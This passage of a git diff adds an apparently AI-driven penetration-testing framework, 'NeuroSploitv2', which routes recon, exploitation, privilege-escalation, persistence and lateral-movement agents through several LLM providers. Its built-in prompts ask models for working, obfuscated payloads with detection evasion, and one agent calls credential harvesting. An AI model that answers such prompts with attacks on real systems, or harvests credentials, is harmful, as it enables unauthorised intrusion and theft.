str(e) + + return result + + def _harvest_credentials(self, system_info: Dict) -> List[Dict]: + """Harvest credentials after privilege escalation""" + os_type = system_info.get("os") + + if os_type == "linux": + return self.cred_harvester.harvest_linux() + elif os_type == "windows": + return self.cred_harvester.harvest_windows() + + return [] diff --git a/agents/web_pentest_agent.py b/agents/web_pentest_agent.py new file mode 100644 index 0000000..6e7a7dc --- /dev/null +++ b/agents/web_pentest_agent.py @@ -0,0 +1,120 @@ +#!/usr/bin/env python3 +""" +Web Pentest Agent - Specialized agent for web application penetration testing. +""" + +import json +import logging +from typing import Dict, List +from core.llm_manager import LLMManager +from tools.web_pentest import WebRecon # Import the moved WebRecon tool + +logger = logging.getLogger(__name__) + +class WebPentestAgent: + """Agent responsible for comprehensive web application penetration testing.""" + + def __init__(self, config: Dict): + """Initializes the WebPentestAgent.""" + self.config = config + self.llm = LLMManager(config) + self.web_recon = WebRecon(config) + # Placeholder for web exploitation tools if they become separate classes + # self.web_exploiter = WebExploiter(config) + logger.info("WebPentestAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Executes the web application penetration testing phase.""" + logger.info(f"Starting web pentest on {target}") + + results = { + "target": target, + "status": "running", + "web_recon_results": {}, + "vulnerability_analysis": [], + "exploitation_attempts": [], + "ai_analysis": {} + } + + try: + # Phase 1: Web Reconnaissance + logger.info("Phase 1: Web Reconnaissance (WebPentestAgent)") + web_recon_output = self.web_recon.analyze(target) + results["web_recon_results"] = web_recon_output + + # Phase 2: Vulnerability Analysis (AI-powered) + logger.info("Phase 2: AI-powered Vulnerability Analysis") + # This part will be improved later with more detailed vulnerability detection in WebRecon + # For now, it will look for findings reported by WebRecon + + potential_vulnerabilities = self._identify_potential_web_vulnerabilities(web_recon_output) + + if potential_vulnerabilities: + results["vulnerability_analysis"] = potential_vulnerabilities + ai_vulnerability_analysis = self._ai_analyze_web_vulnerabilities(potential_vulnerabilities, target) + results["ai_analysis"]["vulnerability_insights"] = ai_vulnerability_analysis + else: + logger.info("No immediate web vulnerabilities identified by WebRecon.") + + # Phase 3: Web Exploitation (Placeholder for now) + # This will integrate with exploitation tools later. + + results["status"] = "completed" + logger.info("Web pentest phase completed") + + except Exception as e: + logger.error(f"Error during web pentest: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _identify_potential_web_vulnerabilities(self, web_recon_output: Dict) -> List[Dict]: + """ + Identifies potential web vulnerabilities based on WebRecon output. + This is a placeholder and will be enhanced as WebRecon improves. + """ + vulnerabilities = [] + if "vulnerabilities" in web_recon_output: + vulnerabilities.extend(web_recon_output["vulnerabilities"]) + return vulnerabilities + + def _ai_analyze_web_vulnerabilities(self, vulnerabilities: List[Dict], target: str) -> Dict: + """Uses AI to analyze identified web vulnerabilities.""" + prompt = self.llm.get_prompt( + "web_recon", + "ai_analysis_user", + default=f""" +Analyze the following potential web vulnerabilities identified on {target} and provide insights: + +Vulnerabilities: {json.dumps(vulnerabilities, indent=2)} + +Provide: +1. Prioritized list of vulnerabilities +2. Recommended exploitation steps for each (if applicable) +3. Potential impact +4. Remediation suggestions + +Response in JSON format with actionable recommendations. +""" + ) + + system_prompt = self.llm.get_prompt( + "web_recon", + "ai_analysis_system", + default="""You are an expert web penetration tester and security analyst. +Provide precise analysis of web vulnerabilities and practical advice for exploitation and remediation.""" + ) + + try: + # Format the user prompt with recon_data + formatted_prompt = prompt.format( + target=target, + vulnerabilities_json=json.dumps(vulnerabilities, indent=2) + ) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI web vulnerability analysis error: {e}") + return {"error": str(e), "raw_response": response if 'response' in locals() else None} + diff --git a/config/config-example.json b/config/config-example.json new file mode 100644 index 0000000..f5d6f91 --- /dev/null +++ b/config/config-example.json @@ -0,0 +1,50 @@ +{ + "llm": { + "provider": "gemini", + "model": "gemini-pro", + "api_key": "", + "temperature": 0.7, + "max_tokens": 4096 + }, + "agents": { + "recon": { + "enabled": true, + "priority": 1 + }, + "exploitation": { + "enabled": true, + "priority": 2 + }, + "privilege_escalation": { + "enabled": true, + "priority": 3 + }, + "persistence": { + "enabled": true, + "priority": 4 + }, + "lateral_movement": { + "enabled": true, + "priority": 5 + } + }, + "methodologies": { + "owasp_top10": true, + "cwe_top25": true, + "network_pentest": true, + "ad_pentest": true, + "web_security": true + }, + "tools": { + "nmap": "/usr/bin/nmap", + "metasploit": "/usr/bin/msfconsole", + "burpsuite": "/usr/bin/burpsuite", + "sqlmap": "/usr/bin/sqlmap", + "hydra": "/usr/bin/hydra" + }, + "output": { + "format": "json", + "verbose": true, + "save_artifacts": true + } +} \ No newline at end of file diff --git a/config/config.json b/config/config.json new file mode 100644 index 0000000..e833f2b --- /dev/null +++ b/config/config.json @@ -0,0 +1,140 @@ +{ + "llm": { + "default_profile": "gemini_pro_default", + "profiles": { + "ollama_llama3_default": { + "provider": "ollama", + "model": "llama3:8b", + "api_key": "", + "temperature": 0.7, + "max_tokens": 4096, + "input_token_limit": 8000, + "output_token_limit": 4000, + "cache_enabled": true, + "search_context_level": "medium", + "pdf_support_enabled": false, + "guardrails_enabled": true, + "hallucination_mitigation_strategy": "grounding" + }, + "claude_opus_default": { + "provider": "claude", + "model": "claude-3-opus-20240229", + "api_key": "${ANTHROPIC_API_KEY}", + "temperature": 0.3, + "max_tokens": 4096, + "input_token_limit": 200000, + "output_token_limit": 4000, + "cache_enabled": true, + "search_context_level": "high", + "pdf_support_enabled": true, + "guardrails_enabled": true, + "hallucination_mitigation_strategy": "self_reflection" + }, + "gemini_pro_default": { + "provider": "gemini", + "model": "gemini-pro", + "api_key": "${GEMINI_API_KEY}", + "temperature": 0.7, + "max_tokens": 4096, + "input_token_limit": 30720, + "output_token_limit": 2048, + "cache_enabled": true, + "search_context_level": "medium", + "pdf_support_enabled": true, + "guardrails_enabled": true, + "hallucination_mitigation_strategy": "consistency_check" + }, + "gpt_4o_default": { + "provider": "gpt", + "model": "gpt-4o", + "api_key": "${OPENAI_API_KEY}", + "temperature": 0.5, + "max_tokens": 4096, + "input_token_limit": 128000, + "output_token_limit": 4000, + "cache_enabled": true, + "search_context_level": "high", + "pdf_support_enabled": true, + "guardrails_enabled": true, + "hallucination_mitigation_strategy": "grounding" + } + } + }, + "agent_roles": { + "bug_bounty_hunter": { + "enabled": true, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["subfinder", "nuclei", "burpsuite", "sqlmap"], + "description": "Focuses on web application vulnerabilities, leveraging recon and exploitation tools." + }, + "blue_team_agent": { + "enabled": true, + "llm_profile": "claude_opus_default", + "tools_allowed": [], + "description": "Analyzes logs and telemetry for threats, provides defensive strategies." + }, + "exploit_expert": { + "enabled": true, + "llm_profile": "gpt_4o_default", + "tools_allowed": ["metasploit", "nmap"], + "description": "Devises exploitation strategies and payloads for identified vulnerabilities." + }, + "red_team_agent": { + "enabled": true, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["nmap", "metasploit", "hydra"], + "description": "Plans and executes simulated attacks to test an organization's defenses." + }, + "replay_attack_specialist": { + "enabled": true, + "llm_profile": "ollama_llama3_default", + "tools_allowed": ["burpsuite"], + "description": "Identifies and leverages replay attack vectors in network traffic or authentication." + }, + "pentest_generalist": { + "enabled": true, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["nmap", "subfinder", "nuclei", "metasploit", "burpsuite", "sqlmap", "hydra"], + "description": "Performs comprehensive penetration tests across various domains." + }, + "owasp_expert": { + "enabled": true, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["burpsuite", "sqlmap"], + "description": "Specializes in assessing web applications against OWASP Top 10 vulnerabilities." + }, + "cwe_expert": { + "enabled": true, + "llm_profile": "claude_opus_default", + "tools_allowed": [], + "description": "Analyzes code and reports for weaknesses based on MITRE CWE Top 25." + }, + "malware_analyst": { + "enabled": true, + "llm_profile": "gpt_4o_default", + "tools_allowed": [], + "description": "Examines malware samples to understand functionality and identify IOCs." + } + }, + "methodologies": { + "owasp_top10": true, + "cwe_top25": true, + "network_pentest": true, + "ad_pentest": true, + "web_security": true + }, + "tools": { + "nmap": "/usr/bin/nmap", + "metasploit": "/usr/bin/msfconsole", + "burpsuite": "/usr/bin/burpsuite", + "sqlmap": "/usr/bin/sqlmap", + "hydra": "/usr/bin/hydra", + "subfinder": "/usr/local/bin/subfinder", + "nuclei": "/usr/local/bin/nuclei" + }, + "output": { + "format": "json", + "verbose": true, + "save_artifacts": true + } +} \ No newline at end of file diff --git a/core/__init__.py b/core/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/llm_manager.py b/core/llm_manager.py new file mode 100644 index 0000000..1b63459 --- /dev/null +++ b/core/llm_manager.py @@ -0,0 +1,651 @@ +#!/usr/bin/env python3 +""" +LLM Manager - Unified interface for multiple LLM providers +Supports: Claude, GPT, Gemini, Ollama, and custom models +""" + +import os +import json +import subprocess +from typing import Dict, List, Optional, Any +import logging +import requests +from pathlib import Path # Added for Path +import re # Added for regex operations + +logger = logging.getLogger(__name__) + + +class LLMManager: + """Manage multiple LLM providers""" + + def __init__(self, config: Dict): + """Initialize LLM manager""" + self.config = config.get('llm', {}) + self.default_profile_name = self.config.get('default_profile', 'gemini_pro_default') + self.profiles = self.config.get('profiles', {}) + + self.active_profile = self.profiles.get(self.default_profile_name, {}) + + # Load active profile settings + self.provider = self.active_profile.get('provider', 'gemini').lower() + self.model = self.active_profile.get('model', 'gemini-pro') + self.api_key = self._get_api_key(self.active_profile.get('api_key', '')) + self.temperature = self.active_profile.get('temperature', 0.7) + self.max_tokens = self.active_profile.get('max_tokens', 4096) + + # New LLM parameters + self.input_token_limit = self.active_profile.get('input_token_limit', 4096) + self.output_token_limit = self.active_profile.get('output_token_limit', 4096) + self.cache_enabled = self.active_profile.get('cache_enabled', False) + self.search_context_level = self.active_profile.get('search_context_level', 'medium') # low, medium, high + self.pdf_support_enabled = self.active_profile.get('pdf_support_enabled', False) + self.guardrails_enabled = self.active_profile.get('guardrails_enabled', False) + self.hallucination_mitigation_strategy = self.active_profile.get('hallucination_mitigation_strategy', None) + + + # New prompt loading + + + self.json_prompts_file_path = Path("prompts/library.json") + + + self.md_prompts_dir_path = Path("prompts/md_library") + + + self.prompts = self._load_all_prompts() # New method to load both + + + + + + logger.info(f"Initialized LLM Manager - Provider: {self.provider}, Model: {self.model}, Profile: {self.default_profile_name}") + + + + + + def _get_api_key(self, api_key_config: str) -> str: + + + """Helper to get API key from config or environment variable""" + + + if api_key_config.startswith('${') and api_key_config.endswith('}'): + + + env_var = api_key_config[2:-1] + + + return os.getenv(env_var, '') + + + return api_key_config + + + + + + def _load_all_prompts(self) -> Dict: + + + """Load prompts from both JSON library and Markdown library files.""" + + + all_prompts = { + + + "json_prompts": {}, + + + "md_prompts": {} + + + } + + + + + + # Load from JSON library + + + if self.json_prompts_file_path.exists(): + + + try: + + + with open(self.json_prompts_file_path, 'r') as f: + + + all_prompts["json_prompts"] = json.load(f) + + + logger.info(f"Loaded prompts from JSON library: {self.json_prompts_file_path}") + + + except Exception as e: + + + logger.error(f"Error loading prompts from {self.json_prompts_file_path}: {e}") + + + else: + + + logger.warning(f"JSON prompts file not found at {self.json_prompts_file_path}. Some AI functionalities might be limited.") + + + + + + # Load from Markdown library + + + if self.md_prompts_dir_path.is_dir(): + + + for md_file in self.md_prompts_dir_path.glob("*.md"): + + + try: + + + content = md_file.read_text() + + + prompt_name = md_file.stem # Use filename as prompt name + + + + + + user_prompt_match = re.search(r"## User Prompt\n(.*?)(?=\n## System Prompt|\Z)", content, re.DOTALL) + + + system_prompt_match = re.search(r"## System Prompt\n(.*?)(?=\n## User Prompt|\Z)", content, re.DOTALL) + + + + + + user_prompt = user_prompt_match.group(1).strip() if user_prompt_match else "" + + + system_prompt = system_prompt_match.group(1).strip() if system_prompt_match else "" + + + + + + if user_prompt or system_prompt: + + + all_prompts["md_prompts"][prompt_name] = { + + + "user_prompt": user_prompt, + + + "system_prompt": system_prompt + + + } + + + else: + + + logger.warning(f"No valid User or System Prompt found in {md_file.name}. Skipping.") + + + + + + except Exception as e: + + + logger.error(f"Error loading prompt from {md_file.name}: {e}") + + + logger.info(f"Loaded {len(all_prompts['md_prompts'])} prompts from Markdown library.") + + + else: + + + logger.warning(f"Markdown prompts directory not found at {self.md_prompts_dir_path}. Some AI functionalities might be limited.") + + + + + + return all_prompts + + + + + + def get_prompt(self, library_type: str, category: str, name: str, default: str = "") -> str: + + + """Retrieve a specific prompt by library type, category, and name. + + + `library_type` can be "json_prompts" or "md_prompts". + + + `category` can be a JSON top-level key (e.g., 'exploitation') or an MD filename (e.g., 'red_team_agent'). + + + `name` can be a JSON sub-key (e.g., 'ai_exploit_planning_user') or 'user_prompt'/'system_prompt' for MD. + + + """ + + + return self.prompts.get(library_type, {}).get(category, {}).get(name, default) + + + + + + def generate(self, prompt: str, system_prompt: Optional[str] = None) -> str: + """Generate response from LLM and apply hallucination mitigation if configured.""" + raw_response = "" + try: + if self.provider == 'claude': + raw_response = self._generate_claude(prompt, system_prompt) + elif self.provider == 'gpt': + raw_response = self._generate_gpt(prompt, system_prompt) + elif self.provider == 'gemini': + raw_response = self._generate_gemini(prompt, system_prompt) + elif self.provider == 'ollama': + raw_response = self._generate_ollama(prompt, system_prompt) + elif self.provider == 'gemini-cli': + raw_response = self._generate_gemini_cli(prompt, system_prompt) + else: + raise ValueError(f"Unsupported provider: {self.provider}") + except Exception as e: + logger.error(f"Error generating raw response: {e}") + return f"Error: {str(e)}" + + if self.guardrails_enabled: + raw_response = self._apply_guardrails(raw_response) # Apply guardrails here + + if self.hallucination_mitigation_strategy and self.hallucination_mitigation_strategy in ["grounding", "self_reflection", "consistency_check"]: + logger.debug(f"Applying hallucination mitigation strategy: {self.hallucination_mitigation_strategy}") + return self._mitigate_hallucination(raw_response, prompt, system_prompt) + + return raw_response + + def _apply_guardrails(self, response: str) -> str: + """Applies basic guardrails to the LLM response.""" + if not self.guardrails_enabled: + return response + + logger.debug("Applying guardrails...") + # Example: Simple keyword filtering + harmful_keywords = ["malicious_exploit_command", "destroy_system", "wipe_data", "unauthorized_access"] # Placeholder keywords + + for keyword in harmful_keywords: + if keyword in response.lower(): + logger.warning(f"Guardrail triggered: Found potentially harmful keyword '{keyword}'. Response will be sanitized or flagged.") + # A more robust solution would involve redaction, re-prompting, or flagging for human review. + # For this example, we'll replace the keyword. + response = response.replace(keyword, "[REDACTED_HARMFUL_CONTENT]") + response = response.replace(keyword.upper(), "[REDACTED_HARMFUL_CONTENT]") + + # Example: Length check (if response is excessively long and not expected) + # Using output_token_limit for a more accurate comparison + if len(response.split()) > self.output_token_limit * 1.5: # Roughly estimate tokens by word count + logger.warning("Guardrail triggered: Response is excessively long. Truncating or flagging.") + response = " ".join(response.split()[:int(self.output_token_limit * 1.5)]) + "\n[RESPONSE TRUNCATED BY GUARDRAIL]" + + # Ethical check (can be another LLM call, but for simplicity, a fixed instruction) + # This is more about ensuring the tone and content align with ethical hacking principles. + # This is a very simplistic example. A real ethical check would be more nuanced. + # For now, just a log or a general check for explicit unethical instructions. + if any(bad_phrase in response.lower() for bad_phrase in ["perform illegal activity", "bypass security illegally"]): + logger.warning("Guardrail triggered: Response contains potentially unethical instructions. Flagging for review.") + response = "[UNETHICAL CONTENT FLAGGED FOR REVIEW]\n" + response + + return response + + def _mitigate_hallucination(self, raw_response: str, original_prompt: str, original_system_prompt: Optional[str]) -> str: + """Applies configured hallucination mitigation strategy.""" + strategy = self.hallucination_mitigation_strategy + + # Temporarily disable mitigation to prevent infinite recursion when calling self.generate internally + original_mitigation_state = self.hallucination_mitigation_strategy + self.hallucination_mitigation_strategy = None + + try: + if strategy == "grounding": + verification_prompt = ( + f"Review the following response:\n\n---\n{raw_response}\n---\n\n" + f"Based *only* on the context provided in the original prompt (user: '{original_prompt}', system: '{original_system_prompt or "None"}'), " + f"is this response factual and directly supported by the context? If not, correct it to be factual. " + f"If the response is completely unsourced or makes claims beyond the context, state 'UNSOURCED'." + ) + logger.debug("Applying grounding strategy: Re-prompting for factual verification.") + return self.generate(verification_prompt, "You are a fact-checker whose sole purpose is to verify LLM output against provided context.") + + elif strategy == "self_reflection": + reflection_prompt = ( + f"Critically review the following response for accuracy, logical consistency, and adherence to the original prompt's instructions:\n\n" + f"Original Prompt (User): {original_prompt}\n" + f"Original Prompt (System): {original_system_prompt or "None"}\n\n" + f"Generated Response: {raw_response}\n\n" + f"Identify any potential hallucinations, inconsistencies, or areas where the response might have deviated from facts or instructions. " + f"If you find issues, provide a corrected and more reliable version of the response. If the response is good, state 'ACCURATE'." + ) + logger.debug("Applying self-reflection strategy: Re-prompting for self-critique.") + return self.generate(reflection_prompt, "You are an AI assistant designed to critically evaluate and improve other AI-generated content.") + + elif strategy == "consistency_check": + logger.debug("Applying consistency check strategy: Generating multiple responses for comparison.") + responses = [] + for i in range(3): # Generate 3 responses for consistency check + logger.debug(f"Generating response {i+1} for consistency check.") + res = self.generate(original_prompt, original_system_prompt) + responses.append(res) + + if len(set(responses)) == 1: + return responses[0] + else: + logger.warning("Consistency check found varying responses. Attempting to synthesize a consistent answer.") + synthesis_prompt = ( + f"Synthesize a single, consistent, and factual response from the following AI-generated options. " + f"Prioritize factual accuracy and avoid information present in only one response if contradictory. " + f"If there's significant disagreement, state the core disagreement.\n\n" + f"Options:\n" + "\n---\n".join(responses) + ) + return self.generate(synthesis_prompt, "You are a highly analytical AI assistant tasked with synthesizing consistent information from multiple sources.") + + return raw_response # Fallback if strategy not recognized or implemented + finally: + self.hallucination_mitigation_strategy = original_mitigation_state # Restore original state + + def _generate_claude(self, prompt: str, system_prompt: Optional[str] = None) -> str: + """Generate using Claude API""" + import anthropic + + client = anthropic.Anthropic(api_key=self.api_key) + + messages = [{"role": "user", "content": prompt}] + + response = client.messages.create( + model=self.model, + max_tokens=self.max_tokens, + temperature=self.temperature, + system=system_prompt or "", + messages=messages + ) + + return response.content[0].text + + def _generate_gpt(self, prompt: str, system_prompt: Optional[str] = None) -> str: + """Generate using OpenAI GPT API""" + import openai + + client = openai.OpenAI(api_key=self.api_key) + + messages = [] + if system_prompt: + messages.append({"role": "system", "content": system_prompt}) + messages.append({"role": "user", "content": prompt}) + + response = client.chat.completions.create( + model=self.model, + messages=messages, + temperature=self.temperature, + max_tokens=self.max_tokens + ) + + return response.choices[0].message.content + + def _generate_gemini(self, prompt: str, system_prompt: Optional[str] = None) -> str: + """Generate using Google Gemini API""" + import google.generativeai as genai + + genai.configure(api_key=self.api_key) + model = genai.GenerativeModel(self.model) + + full_prompt = prompt + if system_prompt: + full_prompt = f"{system_prompt}\n\n{prompt}" + + response = model.generate_content( + full_prompt, + generation_config={ + 'temperature': self.temperature, + 'max_output_tokens': self.max_tokens, + } + ) + + return response.text + + def _generate_gemini_cli(self, prompt: str, system_prompt: Optional[str] = None) -> str: + """Generate using Gemini CLI""" + try: + full_prompt = prompt + if system_prompt: + full_prompt = f"{system_prompt}\n\n{prompt}" + + # Use gemini CLI tool + cmd = ['gemini', 'chat', '-m', self.model] + + result = subprocess.run( + cmd, + input=full_prompt.encode(), + capture_output=True, + timeout=120 + ) + + if result.returncode == 0: + return result.stdout.decode().strip() + else: + error = result.stderr.decode().strip() + logger.error(f"Gemini CLI error: {error}") + return f"Error: {error}" + + except subprocess.TimeoutExpired: + logger.error("Gemini CLI timeout") + return "Error: Request timeout" + except Exception as e: + logger.error(f"Gemini CLI error: {e}") + return f"Error: {str(e)}" + + def _generate_ollama(self, prompt: str, system_prompt: Optional[str] = None) -> str: + """Generate using Ollama local models""" + try: + url = "http://localhost:11434/api/generate" + + data = { + "model": self.model, + "prompt": prompt, + "stream": False, + "options": { + "temperature": self.temperature, + "num_predict": self.max_tokens + } + } + + if system_prompt: + data["system"] = system_prompt + + response = requests.post(url, json=data, timeout=120) + response.raise_for_status() + + return response.json()["response"] + + except Exception as e: + logger.error(f"Ollama error: {e}") + return f"Error: {str(e)}" + + def analyze_vulnerability(self, vulnerability_data: Dict) -> Dict: + """Analyze vulnerability and suggest exploits""" + # This prompt will be fetched from library.json later + prompt = self.get_prompt("json_prompts", "exploitation", "analyze_vulnerability_user", default=f""" +Analyze the following vulnerability data and provide exploitation recommendations: + +Vulnerability: {json.dumps(vulnerability_data, indent=2)} + +Provide: +1. Severity assessment (Critical/High/Medium/Low) +2. Exploitation difficulty +3. Potential impact +4. Recommended exploit techniques +5. Detection evasion strategies +6. Post-exploitation actions + +Response in JSON format. +""") + system_prompt = self.get_prompt("json_prompts", "exploitation", "analyze_vulnerability_system", default="""You are an expert penetration tester and security researcher. +Analyze vulnerabilities and provide detailed, actionable exploitation strategies. +Consider OWASP, CWE, and MITRE ATT&CK frameworks. +Always include ethical considerations and legal boundaries.""") + + response = self.generate(prompt, system_prompt) + + try: + return json.loads(response) + except: + return {"raw_response": response} + + def generate_payload(self, target_info: Dict, vulnerability_type: str) -> str: + """Generate exploit payload""" + # This prompt will be fetched from library.json later + prompt = self.get_prompt("json_prompts", "exploitation", "generate_payload_user", default=f""" +Generate an exploit payload for the following scenario: + +Target Information: +{json.dumps(target_info, indent=2)} + +Vulnerability Type: {vulnerability_type} + +Requirements: +1. Generate a working payload +2. Include obfuscation techniques +3. Add error handling +4. Ensure minimal detection footprint +5. Include cleanup procedures + +Provide the payload code with detailed comments. +""") + system_prompt = self.get_prompt("json_prompts", "exploitation", "generate_payload_system", default="""You are an expert exploit developer. +Generate sophisticated, tested payloads that are effective yet responsible. +Always include safety mechanisms and ethical guidelines.""") + + return self.generate(prompt, system_prompt) + + def suggest_privilege_escalation(self, system_info: Dict) -> List[str]: + """Suggest privilege escalation techniques""" + # This prompt will be fetched from library.json later + prompt = self.get_prompt("json_prompts", "privesc", "suggest_privilege_escalation_user", default=f""" +Based on the following system information, suggest privilege escalation techniques: + +System Info: +{json.dumps(system_info, indent=2)} + +Provide: +1. Top 5 privilege escalation vectors +2. Required tools and commands +3. Detection likelihood +4. Success probability +5. Alternative approaches + +Response in JSON format with prioritized list. +""") + + system_prompt = self.get_prompt("json_prompts", "privesc", "suggest_privilege_escalation_system", default="""You are a privilege escalation specialist. +Analyze system configurations and suggest effective escalation paths. +Consider Windows, Linux, and Active Directory environments.""") + + response = self.generate(prompt, system_prompt) + + try: + result = json.loads(response) + return result.get('techniques', []) + except: + return [] + + def analyze_network_topology(self, scan_results: Dict) -> Dict: + """Analyze network topology and suggest attack paths""" + # This prompt will be fetched from library.json later + prompt = self.get_prompt("json_prompts", "network_recon", "analyze_network_topology_user", default=f""" +Analyze the network topology and suggest attack paths: + +Scan Results: +{json.dumps(scan_results, indent=2)} + +Provide: +1. Network architecture overview +2. Critical assets identification +3. Attack surface analysis +4. Recommended attack paths (prioritized) +5. Lateral movement opportunities +6. Persistence locations + +Response in JSON format. +""") + + system_prompt = self.get_prompt("json_prompts", "network_recon", "analyze_network_topology_system", default="""You are a network penetration testing expert. +Analyze network structures and identify optimal attack vectors. +Consider defense-in-depth and detection mechanisms.""") + + response = self.generate(prompt, system_prompt) + + try: + return json.loads(response) + except: + return {"raw_response": response} + + def analyze_web_vulnerability(self, vulnerability_type: str, vulnerability_data: Dict) -> Dict: + """Analyze a specific web vulnerability using the appropriate prompt from library.json""" + user_prompt_name = f"{vulnerability_type.lower()}_user" + system_prompt_name = f"{vulnerability_type.lower()}_system" + + # Dynamically fetch user prompt, passing vulnerability_data + user_prompt_template = self.get_prompt("json_prompts", "vulnerability_testing", user_prompt_name) + if not user_prompt_template: + logger.warning(f"No user prompt found for vulnerability type: {vulnerability_type}") + return {"error": f"No user prompt template for {vulnerability_type}"} + + # Replace placeholder in the user prompt template + if vulnerability_type.lower() == "ssrf": + prompt = user_prompt_template.format(http_data_json=json.dumps(vulnerability_data, indent=2)) + elif vulnerability_type.lower() == "sql_injection": + prompt = user_prompt_template.format(input_data_json=json.dumps(vulnerability_data, indent=2)) + elif vulnerability_type.lower() == "xss": + prompt = user_prompt_template.format(xss_data_json=json.dumps(vulnerability_data, indent=2)) + elif vulnerability_type.lower() == "lfi": + prompt = user_prompt_template.format(lfi_data_json=json.dumps(vulnerability_data, indent=2)) + elif vulnerability_type.lower() == "broken_object": + prompt = user_prompt_template.format(api_data_json=json.dumps(vulnerability_data, indent=2)) + elif vulnerability_type.lower() == "broken_auth": + prompt = user_prompt_template.format(auth_data_json=json.dumps(vulnerability_data, indent=2)) + else: + logger.warning(f"Unsupported vulnerability type for analysis: {vulnerability_type}") + return {"error": f"Unsupported vulnerability type: {vulnerability_type}"} + + system_prompt = self.get_prompt("json_prompts", "vulnerability_testing", system_prompt_name) + if not system_prompt: + logger.warning(f"No system prompt found for vulnerability type: {vulnerability_type}") + # Use a generic system prompt if a specific one isn't found + system_prompt = "You are an expert web security tester. Analyze the provided data for vulnerabilities and offer exploitation steps and remediation." + + response = self.generate(prompt, system_prompt) + + try: + return json.loads(response) + except json.JSONDecodeError: + logger.error(f"Failed to decode JSON response for {vulnerability_type} analysis: {response}") + return {"raw_response": response} + except Exception as e: + logger.error(f"Error during {vulnerability_type} analysis: {e}") + return {"error": str(e), "raw_response": response} + + diff --git a/custom_agents/__init__.py b/custom_agents/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/custom_agents/example_agent.py b/custom_agents/example_agent.py new file mode 100644 index 0000000..f31ea67 --- /dev/null +++ b/custom_agents/example_agent.py @@ -0,0 +1,83 @@ +#!/usr/bin/env python3 +""" +Example Custom Agent for NeuroSploitv2 +This demonstrates how to create custom agents for specific tasks +""" + +import logging +from typing import Dict +from core.llm_manager import LLMManager + +logger = logging.getLogger(__name__) + + +class CustomAgent: + """Example custom agent - Web API Security Scanner""" + + def __init__(self, config: Dict): + """Initialize custom agent""" + self.config = config + self.llm = LLMManager(config) + self.name = "WebAPIScanner" + logger.info(f"{self.name} initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute custom agent logic""" + logger.info(f"Running {self.name} on {target}") + + results = { + "agent": self.name, + "target": target, + "status": "running", + "findings": [] + } + + try: + # Your custom logic here + # Example: API endpoint testing + results["findings"] = self._scan_api_endpoints(target) + + # Use AI for analysis + ai_analysis = self._ai_analyze(results["findings"]) + results["ai_analysis"] = ai_analysis + + results["status"] = "completed" + + except Exception as e: + logger.error(f"Error in {self.name}: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _scan_api_endpoints(self, target: str) -> list: + """Custom scanning logic""" + # Implement your custom scanning logic + return [ + {"endpoint": "/api/users", "method": "GET", "auth": "required"}, + {"endpoint": "/api/admin", "method": "POST", "auth": "weak"} + ] + + def _ai_analyze(self, findings: list) -> Dict: + """Use AI to analyze findings""" + prompt = f""" +Analyze the following API security findings: + +{findings} + +Provide: +1. Security assessment +2. Risk prioritization +3. Exploitation recommendations +4. Remediation advice + +Response in JSON format. +""" + + system_prompt = "You are an API security expert." + + try: + response = self.llm.generate(prompt, system_prompt) + return {"analysis": response} + except Exception as e: + return {"error": str(e)} diff --git a/neurosploit.py b/neurosploit.py new file mode 100644 index 0000000..17b080c --- /dev/null +++ b/neurosploit.py @@ -0,0 +1,357 @@ +#!/usr/bin/env python3 +""" +NeuroSploitv2 - AI-Powered Penetration Testing Framework +Author: Security Research Team +License: MIT +Version: 2.0.0 +""" + +import os +import sys +import argparse +import json +from pathlib import Path +from typing import Dict, List, Optional +import logging +from datetime import datetime + +# Setup logging +logging.basicConfig( + level=logging.INFO, + format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', + handlers=[ + logging.FileHandler('logs/neurosploit.log'), + logging.StreamHandler(sys.stdout) + ] +) +logger = logging.getLogger(__name__) + +from core.llm_manager import LLMManager +from agents.base_agent import BaseAgent + +class NeuroSploitv2: + """Main framework class for NeuroSploitv2""" + + def __init__(self, config_path: str = "config/config.json"): + """Initialize the framework""" + self.config_path = config_path + self.config = self._load_config() + # self.agents = {} # Removed as agents will be dynamically created per role + self.session_id = datetime.now().strftime("%Y%m%d_%H%M%S") + self._setup_directories() + + # LLMManager instance will be created dynamically per agent role to select specific profiles + self.llm_manager_instance: Optional[LLMManager] = None + + logger.info(f"NeuroSploitv2 initialized - Session: {self.session_id}") + + def _setup_directories(self): + """Create necessary directories""" + dirs = ['logs', 'reports', 'data', 'custom_agents', 'results'] + for d in dirs: + Path(d).mkdir(exist_ok=True) + + def _load_config(self) -> Dict: + """Load configuration from file""" + if os.path.exists(self.config_path): + with open(self.config_path, 'r') as f: + return json.load(f) + return self._create_default_config() + + def _create_default_config(self) -> Dict: + """Create default configuration""" + config = { + "llm": { + "provider": "gemini", + "model": "gemini-pro", + "api_key": "", + "temperature": 0.7, + "max_tokens": 4096 + }, + "agent_roles": { + "bug_bounty_hunter": { + "enabled": True, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["subfinder", "nuclei", "burpsuite", "sqlmap"], + "description": "Focuses on web application vulnerabilities, leveraging recon and exploitation tools." + }, + "blue_team_agent": { + "enabled": True, + "llm_profile": "claude_opus_default", + "tools_allowed": [], + "description": "Analyzes logs and telemetry for threats, provides defensive strategies." + }, + "exploit_expert": { + "enabled": True, + "llm_profile": "gpt_4o_default", + "tools_allowed": ["metasploit", "nmap"], + "description": "Devises exploitation strategies and payloads for identified vulnerabilities." + }, + "red_team_agent": { + "enabled": True, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["nmap", "metasploit", "hydra"], + "description": "Plans and executes simulated attacks to test an organization's defenses." + }, + "replay_attack_specialist": { + "enabled": True, + "llm_profile": "ollama_llama3_default", + "tools_allowed": ["burpsuite"], + "description": "Identifies and leverages replay attack vectors in network traffic or authentication." + }, + "pentest_generalist": { + "enabled": True, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["nmap", "subfinder", "nuclei", "metasploit", 